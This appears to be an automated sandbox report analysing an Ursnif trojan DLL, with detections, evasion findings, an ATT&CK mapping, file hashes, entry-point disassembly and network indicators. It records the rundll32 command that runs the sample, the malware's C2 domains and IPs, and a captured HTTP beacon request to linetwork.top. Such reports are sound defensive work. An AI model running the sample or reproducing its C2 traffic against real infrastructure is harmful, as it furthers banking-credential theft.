                  Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
                  Source: Yara match | File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
                  Source: Yara match | File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\loaddll32.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWs
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW

                  Anti Debugging

                  Source: C:\Windows\System32\loaddll32.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100015BD LoadLibraryA,GetProcAddress,

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 62.173.145.183 80
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: onlinetwork.top
                  Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 31.41.44.194 80
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: linetwork.top
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe | Code function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF54EC cpuid
                  Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10001C65 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000204A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                  Stealing of Sensitive Information


Remote Access Functionality
MITRE ATT&CK matrix, listed per tactic (leading numbers are the count badges exactly as shown in the report):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Windows Management Instrumentation; 12 Native API; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 1 Regsvr32; 1 Rundll32; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 124 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Impact: 1 Data Encrypted for Impact; Device Lockout; Delete Device Data
Behavior Graph ID: 727158; Sample: ursnif_IAT_corrected.exe.dll; Start date: 21/10/2022; Architecture: WINDOWS; Score: 100
Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 4 other signatures
loaddll32.exe [7] started
    DNS/IP: onlinetwork.top; linetwork.top; 192.168.2.1 (unknown, unknown)
    Signatures: Found evasive API chain (may stop execution after checking system information); Found API chain indicative of debugger detection; Writes or reads registry keys via WMI; Writes registry values via WMI
    regsvr32.exe [6] started
        Signatures: System process connects to network (likely due to code injection or exploit); Writes or reads registry keys via WMI; Writes registry values via WMI
    cmd.exe [1] started
        rundll32.exe [6] started
            DNS/IP: onlinetwork.top; linetwork.top
            Signatures: Writes registry values via WMI
    rundll32.exe [6] started
        DNS/IP: linetwork.top 62.173.145.183, ports 49742, 49743, 49744, SPACENET-ASInternetServiceProviderRU, Russian Federation; onlinetwork.top 31.41.44.194, port 80, ASRELINKRU, Russian Federation
    conhost.exe started

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
ursnif_IAT_corrected.exe.dll | 56% | Virustotal |
ursnif_IAT_corrected.exe.dll | 100% | Avira | TR/Spy.Gen
ursnif_IAT_corrected.exe.dll | 100% | Joe Sandbox ML |

No Antivirus matches

Antivirus detection, unpacked PE files (Source | Detection | Scanner | Label):
0.2.loaddll32.exe.10000000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.loaddll32.exe.7f0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
3.2.regsvr32.exe.2af0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
5.2.rundll32.exe.10000000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.rundll32.exe.45e0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
4.2.rundll32.exe.10000000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.rundll32.exe.2e30000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
3.2.regsvr32.exe.10000000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Antivirus detection, domains (Source | Detection | Scanner | Label):
linetwork.top | 12% | Virustotal |
onlinetwork.top | 12% | Virustotal |
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
linetwork.top | 62.173.145.183 | true | true | | unknown
onlinetwork.top | 31.41.44.194 | true | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
62.173.145.183 | linetwork.top | Russian Federation | 34300 | SPACENET-ASInternetServiceProviderRU | true
31.41.44.194 | onlinetwork.top | Russian Federation | 56577 | ASRELINKRU | true
                  IP
                  192.168.2.1
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 727158
Start date and time: 2022-10-21 00:24:06 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 57s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ursnif_IAT_corrected.exe.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDLL@10/0@8/3
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 82% (good quality ratio 77.8%)
• Quality average: 80.5%
• Quality standard deviation: 28.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.16
• Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
00:25:01 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
                  No context
                  No created / dropped files found
File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.836151375360273
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ursnif_IAT_corrected.exe.dll
File size: 57344
MD5: 8b52c277c63c5877c0e4ca32d1458957
SHA1: 1d64f4610c6e0af8a3e3a9d8e8b794fc1bebeef5
SHA256: 8d2f90927603c33947463dc9846dc1b7a220ea1f13dc1a0ccfe538d5f83bbfe2
SHA512: 9f7022155d4764e625fe1a6b5377eed4b2e7620a9bd03c7f5474112de30bb60b7898c5e9a325035544d01c3621bff103f6b857373d146c1f622772e1abbf1b99
SSDEEP: 768:A2KGmsx3R69vSvjyRpq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiu6:wGBx3R6iApqlaPGhVMq2LpeReOb2Pmp
TLSH: EB43E06A6F6008F7C1A3823636397795EA09132141356CD4E7970D381BDA95EEEBF313
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Xo.T.............v.......v..........n............................v.......v.......v......Rich............PE..L.....%c...........
Icon Hash: 74f0e4ecccdce0e4
Entrypoint: 0x10001d80
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp: 0x632596CB [Sat Sep 17 09:43:39 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 3e85858f9f91b022a15a56437fb6f7c2
                  Instruction
                  push ebp
                  mov ebp, esp
                  push ecx
                  mov eax, dword ptr [ebp+0Ch]
                  push ebx
                  push esi
                  push edi
                  xor edi, edi
                  inc edi
                  xor ebx, ebx
                  sub eax, ebx
                  mov dword ptr [ebp-04h], edi
                  je 00007F0F88C99A41h
                  dec eax
                  jne 00007F0F88C99A8Bh
                  push 10004188h
                  call dword ptr [10003050h]
                  cmp eax, edi
                  jne 00007F0F88C99A78h
                  push ebx
                  push 00400000h
                  push ebx
                  call dword ptr [10003038h]
                  mov dword ptr [10004190h], eax
                  cmp eax, ebx
                  je 00007F0F88C99A0Ch
                  mov eax, dword ptr [ebp+08h]
                  mov esi, 10004198h
                  mov dword ptr [100041B0h], eax
                  mov eax, esi
                  lock xadd dword ptr [eax], edi
                  mov ecx, dword ptr [ebp+10h]
                  lea eax, dword ptr [ebp+0Ch]
                  push eax
                  call 00007F0F88C99316h
                  push eax
                  push 1000177Ah
                  call 00007F0F88C992ADh
                  mov dword ptr [1000418Ch], eax
                  cmp eax, ebx
                  jne 00007F0F88C99A2Bh
                  or eax, FFFFFFFFh
                  lock xadd dword ptr [esi], eax
                  mov dword ptr [ebp-04h], ebx
                  jmp 00007F0F88C99A1Fh
                  push 10004188h
                  call dword ptr [1000304Ch]
                  test eax, eax
                  jne 00007F0F88C99A10h
                  cmp dword ptr [1000418Ch], ebx
                  je 00007F0F88C999FCh
                  mov esi, 00002328h
                  push edi
                  push 00000064h
                  call dword ptr [10003044h]
                  mov eax, dword ptr [10004198h]
                  test eax, eax
                  je 00007F0F88C999D9h
                  sub esi, 64h
                  cmp esi, ebx
                  jnle 00007F0F88C999B9h
                  push dword ptr [1000418Ch]
                  call dword ptr [1000300Ch]
                  push dword ptr [00000000h]
                  Programming Language:
                  • [ASM] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [EXP] VS2008 SP1 build 30729
                  • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3570 | 0x4e | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x310c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0x14c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0xbc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x16c7 | 0x2000 | False | 0.5145263671875 | data | 5.2662186547605145 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3000 | 0x5be | 0x1000 | False | 0.241455078125 | data | 2.579542966094096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4000 | 0x25c | 0x1000 | False | 0.016357421875 | Matlab v4 mat-file (little endian) *P, rows 5, columns 7, imaginary | 0.0602032822141183 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x5000 | 0x2dc | 0x1000 | False | 0.1953125 | data | 2.0330780582319483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x6000 | 0x8000 | 0x7400 | False | 0.9559199892241379 | data | 7.8057957709243295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
DLL | Import
ntdll.dll | _snwprintf, memset, NtQuerySystemInformation, _aulldiv, RtlUnwind, NtQueryVirtualMemory
KERNEL32.dll | SetThreadAffinityMask, CloseHandle, GetLocaleInfoA, GetSystemDefaultUILanguage, SetThreadPriority, HeapFree, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, HeapCreate, HeapDestroy, GetCurrentThread, SleepEx, WaitForSingleObject, InterlockedDecrement, InterlockedIncrement, HeapAlloc, GetModuleHandleA, GetModuleFileNameW, SetLastError, VirtualProtect, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, TerminateThread, QueueUserAPC, CreateThread, GetProcAddress, LoadLibraryA, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW
ADVAPI32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorA
Name | Ordinal | Address
DllRegisterServer | 1 | 0x10001c50
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/21/22-00:25:18.871319 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49715 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:40.718067 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49747 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:25:20.730105 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49718 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:40.718067 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49747 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:12.300672 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49742 | 80 | 192.168.2.4 | 62.173.145.183
10/21/22-00:27:12.300672 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49742 | 80 | 192.168.2.4 | 62.173.145.183
10/21/22-00:25:09.002887 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49711 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:25:29.478642 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 59444 | 53 | 192.168.2.4 | 8.8.8.8
10/21/22-00:25:09.002887 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49711 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:11.884556 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 58914 | 53 | 192.168.2.4 | 8.8.8.8
10/21/22-00:25:23.881073 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49719 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:20.607846 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49743 | 80 | 192.168.2.4 | 62.173.145.183
10/21/22-00:27:20.607846 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49743 | 80 | 192.168.2.4 | 62.173.145.183
10/21/22-00:27:22.814108 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49744 | 80 | 192.168.2.4 | 62.173.145.183
10/21/22-00:27:42.910400 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:32.445316 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49746 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:42.910400 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49748 | 80 | 192.168.2.4 | 13.107.42.16
10/21/22-00:27:22.814108 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49744 | 80 | 192.168.2.4 | 62.173.145.183
10/21/22-00:27:25.963477 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49745 | 80 | 192.168.2.4 | 62.173.145.183
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 21, 2022 00:25:29.478641987 CEST | 192.168.2.4 | 8.8.8.8 | 0x180a | Standard query (0) | onlinetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:25:39.180322886 CEST | 192.168.2.4 | 8.8.8.8 | 0xd013 | Standard query (0) | onlinetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:25:40.999285936 CEST | 192.168.2.4 | 8.8.8.8 | 0x3dcd | Standard query (0) | onlinetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:25:44.133048058 CEST | 192.168.2.4 | 8.8.8.8 | 0xf19f | Standard query (0) | onlinetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:11.884556055 CEST | 192.168.2.4 | 8.8.8.8 | 0xdd20 | Standard query (0) | linetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:20.512377977 CEST | 192.168.2.4 | 8.8.8.8 | 0xd8f | Standard query (0) | linetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:22.557136059 CEST | 192.168.2.4 | 8.8.8.8 | 0x4b6c | Standard query (0) | linetwork.top | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:25.861325979 CEST | 192.168.2.4 | 8.8.8.8 | 0xe014 | Standard query (0) | linetwork.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 21, 2022 00:25:29.915838957 CEST | 8.8.8.8 | 192.168.2.4 | 0x180a | No error (0) | onlinetwork.top | | 31.41.44.194 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:25:39.373328924 CEST | 8.8.8.8 | 192.168.2.4 | 0xd013 | No error (0) | onlinetwork.top | | 31.41.44.194 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:25:41.308494091 CEST | 8.8.8.8 | 192.168.2.4 | 0x3dcd | No error (0) | onlinetwork.top | | 31.41.44.194 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:25:44.507917881 CEST | 8.8.8.8 | 192.168.2.4 | 0xf19f | No error (0) | onlinetwork.top | | 31.41.44.194 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:12.202425003 CEST | 8.8.8.8 | 192.168.2.4 | 0xdd20 | No error (0) | linetwork.top | | 62.173.145.183 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:20.531629086 CEST | 8.8.8.8 | 192.168.2.4 | 0xd8f | No error (0) | linetwork.top | | 62.173.145.183 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:22.746049881 CEST | 8.8.8.8 | 192.168.2.4 | 0x4b6c | No error (0) | linetwork.top | | 62.173.145.183 | A (IP address) | IN (0x0001) | false
Oct 21, 2022 00:27:25.882078886 CEST | 8.8.8.8 | 192.168.2.4 | 0xe014 | No error (0) | linetwork.top | | 62.173.145.183 | A (IP address) | IN (0x0001) | false
                  • linetwork.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49742 | 62.173.145.183 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Oct 21, 2022 00:27:12.300672054 CEST | 8777 | OUT | GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49743 | 62.173.145.183 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
